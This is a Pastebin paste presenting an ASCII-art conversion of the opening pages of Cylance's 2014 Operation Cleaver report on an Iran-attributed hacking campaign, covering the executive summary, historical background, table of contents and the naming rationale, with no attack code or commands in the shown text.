daily pastebin goal
13%
SHARE
TWEET

Cylance #OPCLEAVER ASCII Version

synackpwn Dec 3rd, 2014 (edited) 4,272 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
 1. mMMMMMMNMMMMNNNNNNNNNNNNNmNNmmNNddmNMMMMMMMNNmmmmmmNMMMMhhhdhhhdMMMMMNNMMMMMMMMMMMMMNMMNNmmmmmmmmmmm
 2. dmmmmmmmmNMMmmNNMNNmmmmmmmmdhddmMMNmmMMMMMNmmmmNNNNNMMMMmNhhhhhNMMMMMhdNmmNMMMMMMMMMNNMMMNmmNNNmmNmm
 3. dddmmmmmmmmNNNmmNNNmmmmmmmmNNmdmmmddhdNNNNmmNNNMNmNNmMMMMNNMmmmmmyyhNMMMMMMMMNNNMMMMMMMMmmmmMMNNMMMM
 4. dmmmmmmNMMNNMMdshmmmmmmmddhhdmmmmNNMmmmmhydNmoNhymmhymmdMmdmmmmmmddNMMMMMMMMNNNNNMMMMMMNNhhmMMNMMMMN
 5. dmmmmmMMMMNmNNhddmmmmmmmmmmdddmyhNhdsh+d+d/y+:mmsM+hyd/d+ysd+yyymNMMMMMMMMMMMMMMMMMMMMhsdmNNNNNNNNNm
 6. mNMMMMMMMMmshdhdhdmmmmmmddddhhdooso+dssd+y+dmymhNNhhhmshoyosh/yodmydNMMMMMMMMMMMMMNh+.` .dmmmmmmmmmm
 7. NMMMMMMMMNNdddyshmdhmmNNmhyh+/s:ssoohoyhysoo+++++//+osyyyymoyoy+oo/mNNNNMNMMMMMmy/`      -mmmmmmmmmh
 8. MNmdmdhmdyhhdddddysohNmdmo+o/++dhyoo/-```.--:://///::--````.:oshdshdddmmMNmmho-`          /MMMMMmNMM
 9. mddddyssssysysyhhyyyyoos/+o+hdy+-``.:+syhdddmmmmmmmdddh+++//-.``-+shdhddys:`               +MMMmmmNN
 10. dmmmmddhyddddsydhys//+/ooyds/.`.-/hdmmmmmmhhhysydddhhhhhhddo/ss+-` `:+/-`                   oNNmmmmm
 11. hdmmmmmdddhhhyhmdhsyo/+yyo.`./yysmNdhMMMmymmdddodddddddmmmmdhsydho:                          smmmmmm
 12. yhhhhhhhhhddhyyyhoyyoyy/``:ssohy+s/hMMNNmhMMNhyommmmmmmmyyhhs/so-`                           `ymmmdd
 13. dhhmmdddhhhddh/h+hshh+``/sdmdsyhsshmNddhoyNmdy+sdmmmmmmmsdhs- `                               `hddhh
 14. ddmNNNMNhyyhdhsm+sdy. -ymdmmhddmmmmmdhhsydyssyddmmmmmmmh/:`                                    .yhyy
 15. dhhhhhdmddhodoydyd+ .sNmyyys+mhsdyydsshyhhyhddmmmNNmho-`                                   `.`  -syy
 16. yhdddddmmmyo+h+NN: :mNMMNNmdohyyhyoooymmddmmmmNMNmo.                                       /o/   sdh
 17. yydddhddmyy++yhN- /NMMMMMNNMmmNNyhhsNNmmmmmdysdmmhy:                                       `.`  -sss
 18. yyyyyhyhNodoomN: -mNmNNmmmmmddsohmdmNNNNNmdsoosyyyss/.                                   ```.-:+osso
 19. hhdddmdhshsssh/  smmmmmNNmmmdhs+hmmNNNNNMMMmmhodmmdhso:                            `.-/oyhhyho+yhddh
 20. ddmmmmmdo/sody  .dmmmmmmmhshdNmmMmmMMMMMMMMMNhsNs:--sdmo`                      ``` /dmNNdddhsooooydd
 21. mmmmmmmoyo+hm- :+mhhhhddhsdNMMMNmhhMMNMmo:/m:  h`   -hdyy`                `./++so- `hhhsoooosooooosy
 22. mmmmmmdsoosdh  yshydysyymNmNMNMMMddMMNm:  `+   /`---:+++s:            `.:/hNMNhym+` /ooyshyohhdNNNNN
 23. mmmmmmsssydm+ `y+ohyhddNMMMMMNddMNMN+..-  .+  -:-.      -+`       `./sdNNhymNmymms. -ohssyshdshmNmNM
 24. mmmmmmydyyhd: -hhhmhNMMMNNmmMNNmmmmo  .-  ./ `o.```.`    `:.   `.:ymNNNmmmdhyyhNmo+ .ooooyyyyosysddd
 25. mmmmmm//y+yy. :ddmhydMNNdhdhdymdNmm/  :-  -/   /+-.:o`     +.-ohmmNNNNmmmmmmhyoddd/ `oohmNNNMdodmhyy
 26. mmmmmmhyy/sy- /NNmmsyMNmmdhNmmMMNNy+  :-  :/   o    -y`    .NNmmNMMMMmmmmmmmmyhhds: .yhmNNNmMmyymhyh
 27. mmmmmds+o:yh: :MMMNdysdhhNNMMMMMMM.o  /:``+s:-:- `:::.     .MMMMMMMMMMNmmmmmmsmmdh: :mmmmmmmmdydmmmM
 28. mmmmNmdoyysNy `NMMMNNdyMmmmmdMMMMd +sshy+-.     -/.        yMMMMMMMMMMMMMNNNdymmmm. +mmmmmmmmmmmmmNM
 29. mmmNMMNyhhyNN` sMMMMMhMMMMNhdddmNs.:+:.       `/.         +mmdddmNMMMMMMMNNNydmmmy  hdmmmmmmdmmmmNMM
 30. mmNNMMMmyhdoMs .MMMMMhMMMmsshmmmo:.         `:o`        `+hmmNmmhdMNMMMMMNMmyddmm- /dhhmmmmdhmmmNNMM
 31. mmmNNMMmyNdomN. oMMMMmmMMhhNNo-           :odd`       `/+-hdhhdhhhhmMMMMMMMNsoomo `dmNdyhmmddhdmmmNM
 32. mmmmNNMMMmom+my` sNMMMmmMMMMh          `-/+ohs      `++.`yddhhhmNMohMMMMMNNys+ho  ohhmmmdddmdmdmmmmN
 33. dmmmmmmmNhssssdy `hMMMMmmMMMN`       -:.    `+-   .++. `yhmmmdyhhmhMMMMNms+o:oo  oddmmdmmddmNmmmmmmm
 34. mmmmMMMmmm/soohmy` yMMMMmdMMMd-   .+s.  -::/++:-://`  -dmmmmmmdmmhhNNMNs++yhm+  ommmhhddmmmNNmmmmNmm
 35. mmmmNmMNNNNdd+o+my` +NNMNNdMMMMNmNNNNy-              /dmmmmmmmmmmmodmmmyodNm+ `smmmdhddmmmNMMMMNMMMM
 36. mmNmmmmmmmmmMys+yyy: .oddNddNMMMMMMNmho              dmmmmmmmmmmmmsdhhdNMNh. -hmmmmdmMMMMMMMMMMMMMMM
 37. mNNNmmmmmmmNmms/+/hho` -smmydMMMMMNdNMh              dmmmNmdhhdmmmhydddNm/ `sNmmmdmNMMMMMMMMMMMMMMMM
 38. mmmmmmmmNNNmdmhs+//+sy+. :syssddyodMMNy              dddhdddsoydhhhyyys:``+dmMNmmmMMMMMMMMNMMMMMMMMM
 39. mmmmmmmmmNmdhNMNss/s+hhNs. ./oosomMMMNh              hdhhydhyyhhyyys+. ./hhdmdMmNNNNNMNmNMMMMMMMMMMM
 40. dmmmmmMMMMMNNNNmyyyoooshhhy/``./oymNdyo              yhyyyhhhyhys/-``:oymmNNNMMMNmmNmNNNMMMMMNNNNMNm
 41. mmmNMMMMMMMNhdhddmMmmho+soyyhs/.``:syy+              yyddddho/-``.:sdmmmNNNMNMMNNNMMMMMMMMMMMMMMMMMN
 42. MMMMMMMmmmmhdMmMMMMNNhoshoy/yoddhs/:.``              oo/:-.``-/ohddmmmNNNmMNNMMNNMMMMMMMMMMMMMMMMMMM
 43. NMMMMMNmmdhdmMMMMMNmhhdmhsoy+++oosymdh+              .---:+sshdmNMNNNNMNmmNNMhmMMMMMNMMMMMMMMMMMMMMM
 44. MmMmmMNMMMNMMMMMNMNddmmddmmdyddo++dmmms            `.+oo+++osNNMMMMMNNMNMNMMMMMNNNNmddNMMNMMMNNMMMMM
 45. NhhddNMNNMMMNNNMNNmmdddhohmdddh+/+ddmy+         .:ohsssoosddmMMMMMMMMMMMMMMMMMMMMMMNmmmddNNmNNmmmNmN
 46. ydhhhmmmmNMMNmmNmmmdddyyyhdyoosyoohsss+    ``   sodmmmmmmMMMMMNhdMNmhhMMNMNmdNMMMMMMNNNmmNMNNNmNNmmm
 47. yhmmmmmmmmNNmmmNNMNmmmmmNdhsssyydNyyyhy.:/s+-   ssydmmdmNMMMNmhsssyyooymNmmddmmmmMMNNMNMMMMMMMNNmmmm
 48. hmNmmmmmmmmmmdmmmmmmmmmMNMMNNmmMMMMmmmmdmmyy:   dmyyyhooymmdso++oooo++ooydNNmNNNmmMmdmmNmhhhhddmmddh
 49. mmmmmmmmmdmNNmdmmNNMMMMMMMMMMmdMMMMNmmmmmmmm/   mMMmhhhddysossoo+ooosshyydNMMMNhddhsyhydmddhdyyhddhh
 50. mmmmmmmmmmmmmmmNMNNmNNmmdmMmmdsNNNNmmmmmmNNs.  `/MMMMNMMMNmdNddhhddNMMMNNNMMMMMyosomMMmmmmdmdhhhhdmN
 51. mdmmmddddddmMMMMmddhhhyyyyhhhddmmmmmmmNNNMMso-.oodNNNNNNNMMMMNNNMMMMMMMMMmmNMMMNNNNMmNmmNmdmmmdhddhd
 52. dddhdmddmNMNNdddddhhhyyyyhhhhhhhmmmNMNNmMMd+/:./+ommmmmmmmMMMMMMMMMMMMMMMNNNMMNMMMMNNMNMMNmNNNmddhyh
 53. hhhyhhNNMMNNdhhdmmddhyyyyddmdhddddmmNdddmNsoo/:+++dmmmmmNNMMMMMMMMMMMMMMMMMMMMmNNMMNMMMMMMMMMMMmNmdm
 54. yyyyhdddmNdhhhdNmNNMNyhhyyhmdhdddmmmmmdhhy:::` :::+mNNmmNMMMMMMMMMNdNMMNNMMMMMMNMMMMMMMMMMMMMMMMMMMM
 55. hhhydhhhddhdmNNMMMMNMmNdhdmNNmmmdmmmmmmmh-         mMNNmMMMMMMMMMmNdymmmmNMMMMMMMMMMMMMMMMMMMMMMMMMM
 56. dmddddmmmddNMMNNMMNMMNmhdNmdmmmdhhdmmdhhy.         NNMMMMMMMMMMMMMMmMMMNmNMMMNMMMMMMMMMMMMMMMMMMMMMN
 57. mNmNNNNNNNMMMMMMMNMMMMMmhhhhhmmmdhhhdhyyh.         mMMMMMMMMMMNNdNNmmmmmmmNNmNNMNNNNNNmNNMMMMMMNNmmm
 58. MMNMMMMMMMMNMMMMMMNNNMMMmddmmmmdhyyhhhyyh/:``````//NMMNNMMMMNNdhmmmmmmdmmmmNNMNmmmmmmmddmmmNMMMNmdmm
 59. MNMMMMMMMMMMMNMMMMmhhmmNNhhdddhhhyhmmmdddhy`     yMMNNNmmMMMNdmmmNmmmmmmNmNNMmmmmmmmmmmmmmmmmmMNmmmm
 60. yomNhmmmmNNMMNmmddhyyyyhhyyyyhyhdddmmmmmdhd`  `` yMMMmNNMNNNMNMNMMNmmmmdmmmmmdmmmmmmmmmmmmdydmmmmmmm
 61. ssoooydmdmNMNmdhhhhhhhhyyyyyyhyyhdhdmddyyyo`-/+o:sMMMMMMMMNmmNNmNNmmmmmmmmmmmmmmmmmmmhddhhhydhdNNhhN
 62. hyyyo+sysdmmhyhmmdmmNmmddddhhhyhdmmddyhhdhNyyyyhymNMMMMMMMMNNNNmmmmmmmmmmddmMMNNmmmmmmmhdhhyyhyyyhdN
 63. mms***************NMMMMNMMdhhhhyhhhmNNNNMMMMMmmmmmmdmmmmmNMNNmmmmmmmmmmmdhydmMNMM****************NMM
 64. MMN****CYLANCE****mmmmmmNMNMMmhhdhhdddNMMMMMMMMNhddmmmmmNNmmmmmmmmmmmmmmmmmdddydm***#OPCLEAVER***NmN
 65. NMM***************mmNNNmmNNmmmNNNNNMMNNNmNNNmyyyhhhdddmdhhddddmmmmhyhhhhdddmmmddd****************nMM
 66. NNNMMMMNmmmmdmmNmdNmNMMMNMMNNMMMMMMMMNmNNNhhhyyyyyyyyhhyydmmdyhdhhyyyyyyhmdmmmmhdNmmmmmmmmmdsyshdNMM
 67.  
 68. /= = = = = = = = = = = = = = = = *Converted to ASCII by @SYNACKPWN* = = = = = = = = = = = = = = = =\
 69.  
 70. [CYLANCE                                                                                 #OPCLEAVER]
 71.  
 72.                                         OPERATION CLEAVER
 73.  
 74.                         “Iran should be considered a first-tier cyber power.”
 75.                                         Gabi Siboni
 76.                 Israel Institute for National Security Studies cybersecurity expert
 77.  
 78.                         “Iran has rapidly gained near parity with the Chinese but
 79.                            may be closer to the Russians in terms of swagger.”
 80.                                    Retired Admiral William J. Fallon
 81.                                         Former Commander CENTCOM
 82.  
 83.         “Global critical infrastructure organizations need to take this threat seriously.
 84.                            The Iranian adversary is real and they’re
 85.                                 coming, if not already here.”
 86.                                         Mark Weatherford
 87.      Former Deputy Under Secretary for Cybersecurity at the US Department of Homeland Security
 88.  
 89.                                 “Yes, China and one or two others
 90.                                  can shut down our power grids.”
 91.                                         Admiral Michael Rogers
 92.              Director of the National Security Agency and head of US Cyber Command
 93.  
 94.                      “The world has combated cyber threats by doing the same
 95.                     thing over and over again … It’s the definition of insanity.”
 96.                                         Jeff Moss
 97.             Co-Chair DHS Community Resiliency Task Force, Founder of DEFCON and BlackHat
 98.  
 99.                                      سکوت پاسخ می دهد
 100.                                 Jalal ad-Din Muhammad Rumi
 101.                 13th Century Persian poet, jurist, theologian and Sufi mystic
 102.                         English translation: “Silence gives answers.”
 103.  
 104. [ PG-2  Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 105.  
 106.  
 107.  
 108. [CYLANCE                                                                                  #OPCLEAVER]
 109.  
 110.                                 [---PREVENTION IS EVERYTHING---]
 111.                         A personal note from Cylance, CEO Stuart McClure
 112.  
 113. On February 24, 1989, United Flight 811 left Honolulu, Hawaii, on its way to Auckland, New Zealand,
 114. with 364 souls on board. Somewhere between 23,000 and 24,000 feet an enormous explosion ejected nine
 115. passengers into the dark void over the Pacific Ocean. This aviation disaster was later determined to
 116. have been caused by a simple design flaw combined with the lack of corrective action. Boeing and the
 117. FAA had known about this problem for over one year prior to the accident. The result: nine people
 118. lost their lives. The other 337 passengers plus 18 crew members who survived, live with the memory
 119. every day; all of it due to a highly preventable design flaw. As a 19-year-old young adult, I was
 120. grateful to have survived but I had no idea how that single event would impact my future in such a
 121. profound way. Much of my passion for cybersecurity can be directly attributed to that fateful day.
 122.  
 123. The United Flight 811 accident proves just how important it is to detect flaws before tragedy
 124. strikes. Preventable disasters like this are what motivates the Cylance team to create a safer world.
 125. We do everything we can to uncover the flaws in technologies before they damage the physical or
 126. cyber world. Our mission is simple: to protect the world. This report is an attempt to deliver on
 127. that mission.
 128.  
 129. After tracking hackers both personally and professionally for more than 26 years, there is no doubt
 130. in my mind that the release of the information contained in the Operation Cleaver report is vital to
 131. the security of the world’s critical infrastructure.
 132.  
 133. The focus of the Operation Cleaver report is on one particular Iranian team we’ve dubbed
 134. Tarh Andishan, the infrastructure they utilize, as well as their tactics, techniques and procedures.
 135. Roughly translated, “Tarh Andishan” means “thinkers” or “innovators”. This team displays an evolved
 136. skillset and uses a complex infrastructure to perform attacks of espionage, theft, and the potential
 137. destruction of control systems and networks. While our investigation is ongoing, and we presently
 138. have limited visibility inside many of the compromised networks, Cylance observed Tarh Andishan
 139. actively targeting, attacking, and compromising more than 50 victims since at least 2012.
 140.  
 141. Cylance is committed to responsible disclosure and has refrained from exaggeration and embellishment
 142. in this report, limiting our content to only that which can be definitively confirmed. However, we
 143. have speculated on the possible motivations behind these attacks, given our deep knowledge and
 144. understanding of the cyber landscape. We have made every effort to notify all affected entities prior
 145.  to publishing this report. Additionally, all personally identifiable information about the members
 146.  of Operation Cleaver has been withheld. We don’t care who the adversary is, where they work or
 147.  reside, who they’re dating or what party photos they upload to Facebook – all we care about is
 148.  preventing campaigns like Operation Cleaver from negatively affecting the real world.
 149.  
 150. This report is for the world’s cyber defenders – never give up!
 151.  
 152. Stuart McClure CEO/President Cylance, Inc.
 153.  
 154. [ PG-3  Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 155.  
 156.  
 157.  
 158. [CYLANCE                                                                                  #OPCLEAVER]
 159.  
 160. TABLE OF CONTENTS
 161. Executive Summary                               5
 162. Background                                      6
 163. Why the name “Cleaver”?                         8
 164. Why Expose Iran Now?                            8
 165. Critical Discoveries                            9
 166. Targets & Victims                               12
 167. Attribution                                     17
 168. Attacker IP Addresses                           18
 169. Attacker Domains                                19
 170. Tools & Software                                20
 171. Tarh Andishan                                   24
 172. Members                                         26
 173. Teams                                           30
 174. Tactics, Techniques & Procedures (TTPs)         31
 175. Initial Compromise                              32
 176. Privilege Escalation & Pivoting                 36
 177. Exfiltration                                    41
 178. Persistence                                     47
 179. Mitigation                                      60
 180. Speculation: The Why                            62
 181. Conclusion                                      65
 182. References                                      67
 183. About Cylance                                   68
 184. Cylance Products                                69
 185. Cylance Services                                70
 186. Acknowledgments                                 71
 187. The Operation Cleaver Logo                      72
 188. Appendix A: Indicators of Compromise (IOC)      73
 189.  
 190. [ PG-4  Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 191.  
 192.  
 193.  
 194. [CYLANCE                                                                                  #OPCLEAVER]
 195.  
 196. EXECUTIVE SUMMARY
 197.  
 198. Since at least 2012, Iranian actors have directly attacked, established persistence in, and extracted
 199. highly sensitive materials from the networks of government agencies and major critical infrastructure
 200. companies in the following countries: Canada, China, England, France, Germany, India, Israel, Kuwait,
 201. Mexico, Pakistan, Qatar, Saudi Arabia, South Korea, Turkey, United Arab Emirates, and the United States.
 202.  
 203. Iran is the new China.
 204.  
 205. Operation Cleaver has, over the past several years, conducted a significant global surveillance and
 206. infiltration campaign. To date it has successfully evaded detection by existing security technologies.
 207. The group is believed to work from Tehran, Iran, although auxiliary team members were identified in
 208. other locations including the Netherlands, Canada, and the UK. The group successfully leveraged both
 209. publicly available, and customized tools to attack and compromise targets around the globe.
 210. The targets include military, oil and gas, energy and utilities, transportation, airlines, airports,
 211. hospitals, telecommunications, technology, education, aerospace, Defense Industrial Base (DIB),
 212. chemical companies, and governments.
 213.  
 214. During intense intelligence gathering over the last 24 months, we observed the technical capabilities
 215. of the Operation Cleaver team rapidly evolve faster than any previously observed Iranian effort.
 216. As Iran’s cyber warfare capabilities continue to morph,2 the probability of an attack that could
 217. impact the physical world at a national or global level is rapidly increasing.3 Their capabilities
 218. have advanced beyond simple website defacements, Distributed Denial of Service (DDoS) attacks, and
 219. Hacking Exposed style techniques.
 220.  
 221. With minimal separation between private companies and the Iranian government, their modus operandi
 222. seems clear: blur the line between legitimate engineering companies and state- sponsored cyber
 223. hacking teams to establish a foothold in the world’s critical infrastructure.
 224.  
 225. Iran’s rising expertise, along with their choice of victims, has compelled us to release this report
 226. sooner than we would have liked in order to expose Operation Cleaver to the world. The evidence and
 227. indicators of compromise we provide in this report will allow potentially unaware victims to detect
 228. and eliminate Cleaver’s incursions into their networks.
 229.  
 230. [ PG-5  Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 231.  
 232.  
 233.  
 234. [CYLANCE                                                                                  #OPCLEAVER]
 235.  
 236. BACKGROUND
 237.  
 238. Iran has been severely impacted by debilitating and extremely advanced malware campaigns since at
 239. least 2009. Famous examples of these efforts include industrial sabotage via Stuxnet (2009 - 2010),
 240. and espionage with Duqu (2009 - 2011) as well as Flame (2012). These campaigns have targeted Iran’s
 241. nuclear program, and oil and gas operations. Stuxnet was an eye-opening event for Iranian authorities,
 242. exposing them to the world of physical destruction via electronic means.
 243.  
 244. Hacking campaigns sourced out of Iran are nothing new. Since the early 2000’s, the information
 245. security industry as a whole has tracked teams like the Iranian Cyber Army, which mainly focuses on
 246. patriotic hacking (website defacements). After the release of Stuxnet, Iran’s motivations appear to
 247. have shifted. Retaliation for Stuxnet began almost immediately in 2011 with campaigns like the
 248. certificate compromises of Comodo and DigiNotar. These attacks served as a warning, showcasing the
 249. rapid evolution of Iran’s hacking skills.
 250.  
 251. A major retaliation came in the form of 2012’s Shamoon campaign, which impacted RasGas and Saudi Aramco.
 252. It’s estimated that Shamoon impacted over 30,000 computer endpoints and cost  the affected companies
 253. tens-of-thousands of hours recovering from the attacks. The direct financial impact from this
 254. retaliation and amount of downtime experienced were staggering. Shamoon was truly a watershed event
 255. for security defenders. It was the first glimpse into the real capability and intention of Iranian
 256. cyber operations. We see the same motivation and intent here in Operation  Cleaver: establishing a
 257. beachhead for cyber sabotage.
 258.  
 259. We saw further Iranian backlash in late 2012 and early 2013 in the form of Operation Ababil’s
 260. Distributed Denial of Service (DDoS) attacks against US banks. These attacks were debilitating and
 261. impacted the availability of online banking services. Yet more backlash was witnessed with FireEye’s
 262. exposure of Operation Saffron Rose, an espionage campaign executed by the Ajax Security Team
 263. in 2014. In May 2014, evidence emerged of a highly targeted waterhole attack that leveraged social
 264. media, dubbed Operation Newscaster, which was uncovered by iSight Partners.
 265.  
 266. In June 2013, Israeli Prime Minister Benjamin Netanyahu accused Iran of carrying out “non-stop”
 267. attacks on “[Israel’s] vital national systems” including “water, power and banking”4. The following
 268. September of 2013, the Wall Street Journal accused Iran of hacking into unclassified U.S. Navy computers
 269. in San Diego’s NMCI (Navy Marine Corp Intranet),5 which we can confirm was part of Operation Cleaver.
 270.  
 271. [ PG-6  Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 272.  
 273.  
 274.  
 275. [CYLANCE                                                                                  #OPCLEAVER]
 276.  
 277.  
 278. While previously reported operations attributed to Iran have largely focused on Defense Industrial Base (DIB)
 279. companies, the United States Federal Government, or targets in Middle Eastern countries, Operation Cleaver
 280. has instead focused on a wide array of targets, including energy producers and utilities, commercial
 281. airlines and airports, military intelligence, aerospace, hospitals, and even universities – with only
 282. ten of the targets based in the United States. Such broad targeting demonstrates to the world that
 283. Iran is no longer content to retaliate against the US and Israel alone. They have bigger intentions:
 284. to position themselves to impact critical infrastructure globally.
 285.  
 286.                 ORIGINATION                                             RETALIATION
 287.                 OoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO
 288.                                                 [2010]
 289.                                 STUXNET------------|
 290.                                                    |
 291.                                                 [2011]
 292.                                                    |----------COMODO
 293.                                 DUQU---------------|
 294.                                                    |---------DIGINOTAR
 295.                                                 [2012]
 296.                                 FLAME--------------|
 297.                                                    |----------SHAMOON
 298.                                 GAUSS--------------|
 299.                                                    |--------OPERATION ABABIL
 300.                                                 [2013]
 301.                                                    |-------NAVY MARINE CORP INTRANET
 302.                                                 [2014]
 303.                                                    |----------SAFRON ROSE
 304.                                                    |----------NEWSCASTER
 305.                                                    |----------OPCLEAVER
 306.                 OoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO
 307.  
 308. Figure 1: The sequence of major Iran-centric attacks; either as victims (left) or attackers (right).
 309.  
 310. [ PG-7  Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 311.  
 312.  
 313.  
 314. [CYLANCE                                                                                  #OPCLEAVER]
 315.  
 316. WHY THE NAME CLEAVER?
 317.  
 318. The string cleaver is found several times in a variety of custom software used in
 319. Operation Cleaver, including:
 320.  
 321. 1)      Numerous references inside the namespaces of their custom bot code codenamed TinyZBot, e.g.:
 322.  
 323.         e:\projects\cleaver\trunk\zhoupin_cleaver\obj\x86\release\netscp.pdb
 324.  
 325. 2)      PDBs associated with the hacker name “Jimbp”, e.g.:
 326.  
 327.         c:\users\jimbp\desktop\binder_1 - for cleaver\binder_1\obj\x86\release\setup.pdb
 328.  
 329. 3)      PDBs associated with the keystroke loggers, artifacts, and numerous other tools, e.g.:
 330.         e:\Projects\Cleaver\trunk\MainModule\obj\Release\MainModule.pdb
 331.  
 332.  
 333. WHY EXPOSE IRAN NOW?
 334.  
 335. We believe our visibility into this campaign represents only a fraction of Operation Cleaver’s full scope.
 336. We believe that if the operation is left to continue unabated, it is only a matter of time before the
 337. world’s physical safety is impacted by it. While the disclosure of this information will be a detriment
 338. to our ability to track the activity of this group, it will allow the security industry as a whole to
 339. defend against this threat. As such, we are exposing this cyber campaign early in an attempt to minimize
 340. additional real-world impact and prevent further victimization.
 341.  
 342. [ PG-8  Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 343.  
 344.  
 345.  
 346. [CYLANCE                                                                                  #OPCLEAVER]
 347.  
 348.  
 349. @@@@@@@@@@@@@@@@@@@@@@@@###@@@@(((@@@@@@@@@@@%%#@@@@@@@%###%##%&@@@@@@@@@@@@@@@@@@@@@@@@@%%%%%%%%%%
 350. %#####%%#@@&%%@@@@#%%%%%%%%((%#&@@#%%@@@@@#%%%%@@@#@@@@@@@###%#@@@@@@/@&%%@@@@@@@@@@&@@@@@%#@@@%@@%
 351. %#%%%%%%%%@@@%%%@@#%%%%%%%%       CRITICAL DISCOVERIES       @@%%%%%(((@@@@%##@#@@%&@%&@@@@%@@%%@@@
 352. #%%%%%%@@@@@@@(/%%%%%%%%%(((%%%%@@@@#####@@&&%/,,@&*/@&@@@###@##%#@@@@@@@@@%%@@%%@@@@@@@##@@@@@@@@&
 353. (%%%%#@@@@#%@@#%%%%%%%%%%%%(%%(/@@/@/#%/%((/#(@(@@.(,@((&@&(.%%%#@@@@@%@@@@@@@@@@@@@@%%(@@@####@@%%
 354. #@@@@@@@@@/(((#%%%%%%%%%(%%%%%###%,%%,@%/(/#@/@.@@/*###,%(@/%*/(%@&@%@@@@@@@@@@@@@@%    %%%%%%%%%%%
 355. @@@@@@@@@@@%%((&%%@#%#@@%&((,*(.%.%,#%%%%%/,,      .,(&%%#((#*.**(@#@@@@@@@@@@@@.        /########%
 356. @#&(#&(###@###(///@&&(.%.&(%%#&,       .,**//**,.       .#######@@&@&&%             @@@@@&%@@
 357. %%%%(%%%%%%%%&(((((((.%(( (.%%%.    *#%%%%%%%%%%%%%#%##*(((,    .#(%#(##(/                 @@@@%%#@
 358. %%%%%%#####%/(#(((((.(.(,%%%    ,%%%%%%%%%#(*/*%%%###%###%%.,(#*    (&                     .&&&&&&&
 359. (%%%%%%%%(((((%%%%,(((%   ,%%/%@@/#@@@(@@%%%##%%%##%%%%%%%%/%%##.                          %%%%%%
 360. (((((((((%%#(((&%%%*%%%   ##//%#,.#@@&&@@@/#%%%%%%%%*#//**(                              ,%%%%@
 361. #(#@(####((%((#@(%%%%   ##%%#(#//%&@%%#(/&@###*#%%%%%%%%#%#*                                  .%%##
 362. %%@@@@@(((((%%#%.@@.  #%%&@&/@&&&%%%%##*%#(*(%%%%%%%%%%%.                                      *###
 363. #(((((#%%%(##,@(%@  *@@#/((/*%/(%((&/(%##/#%%%%%%@@%&                                           (##
 364. (#%%%%%%%@,/&%&@(  @&@@@@&%%/#%#/%///@%%%%%%%%@@&(                                        ,//*  /##
 365. (####(#%%,.#%&@#  @@@@@@@&&@@&&#,&@&%%%%%#//%%%//                                             ///
 366. ((((###(&((%*@/  %%%@@%%%%%%%/*/%%%%%%@@%%(/////////(                                        ((((((
 367. ##%%%%#@#*.(#/   %%%%%%&@%%%%/,,%%%%&@@@@@@@@(#@@@@(//                               ,#%%@%%&//%%%%
 368. ######%@. ,#%   (%%%%%%%%,(&@@@@@&@@@@@@@@@@@/#@    @(%/                        ,  %%%%#((((//////%
 369. %%%%%%(%.#,%(  (%%///%%#/%%&@@@#@/&@@@@#  /,  ,#    #%(#(                  *(&*#,. %###/(///(//////
 370. %%%%%%%%  %%  *(%/%%#/%@@&@@&@@@@%@@@@%   /    ..((,../*/              ,((@@@%/%#/ .///%/%(/%%@@@@@
 371. %%%%%%*%,@%%  ((#(###@@@@@@@&%/&@@@#  *   #   #.        .(         .#@@@%##@#%//  /%%/%/#%%&/@#%&
 372. %%%%%%%%*%@#  %%%&@%@@@@%%%%&%&%&%%   (   %   (.   ,      (     (#&&%%%%%%%(*%#&/(  (////%%@@/((&@@
 373. %%%%%%*.%*((  ##%%((@@######%&%%%   #   #    %   *(      / #%%%&@@@%%%%%%%%/####  *//@@@@@@//@@##
 374. %%%%%%&&(/((  @@%%%#&@%#@@@@@@&   (   #   .*    .#     (@&%%@@@@@%%%%%%%%(%%%/  /%%%%@%@@%/###(
 375. %%%%%%(&*(((  &@@@&%((((&@@@@@@@@,*   #  .%#((.  .#        &@@@@@@@@@@@%%%%%%%%%%%  %%%%%%%%%@/%@@@
 376. %%%%@@/#@@*@  /@@@%@@#@@@@@@@@@  &@,        /         ,@@@@@@@@@@@@@%@@@/%%%%( .%%%%%%%%%%%%%%@
 377. %%%@@@@, &@@(  &@@@@%@@@@@#(%&/(% (*          (.          (#/((@@@@@@@@%&&(%%%%. %#%%%%%%%@%%&@@@
 378. %%@&@@@,@,@%@. ,@@@@%@@@@(((%&@#            .%          /#%%%%%%/&&&@@@@@@#(#&/  @(#%%%%#(#%%%%@@
 379. %%%&%@@@,@&&@@  @@@@@#@@@&@@%            .%%%,        *# /#%#%##%(#@@@@@@@@%%,%%  (@##%%%%%%%#@
 380. %%%%#@@@@**%/  @@@@%#@@@@@,          /.  *%       (/  #%%###%@@@(@@@@@@%(/(%(  ,%%%%%#%%%%%%%%%%%
 381. %%%%%%%%%%%.%,@#  @@@@@&@@@@&       .(       #    (/   ###%%%##%%%@@@@&%/*/,/(  *%%#%#%%%%%@@%%%%%%
 382. %%%&@@#@@%## (%%(  @@@@%@@@@@%   .(%    ###(,         %%%%%%%%%%%/%%%@%/*&&@&  ,%%%%#%%#%%%%%%%%@@%
 383. %%%%%#@@%@@%,/@*%#  %@@@@%@@@@@@&@@@&%               %%%%%%%%%%%%%#%%%%(#%%/  ,%%%%%#@@@@@@@@@@@@@@
 384. %@@&%%%%%%%%@@%,/((,  (##%#%&@@@@@@#(#              .%%%@%%%%%%%%%/#/%@@@%   %%%%%%@@@@@@@@@@@@@@@@
 385. %##%%%%%%@@%#*#* (&%(   #%#*&@@@@@#@@@              .%%%%%#(((%%%%%####%   ###%%%%@@@@@&@@@@@@@@@@@
 386. %%%%%%%%%@%(#@%@**(.(%%   (#((#**#@@@&              .#######/########(   *%%%@&%&&@@&@@@@&@@@@@@@@@
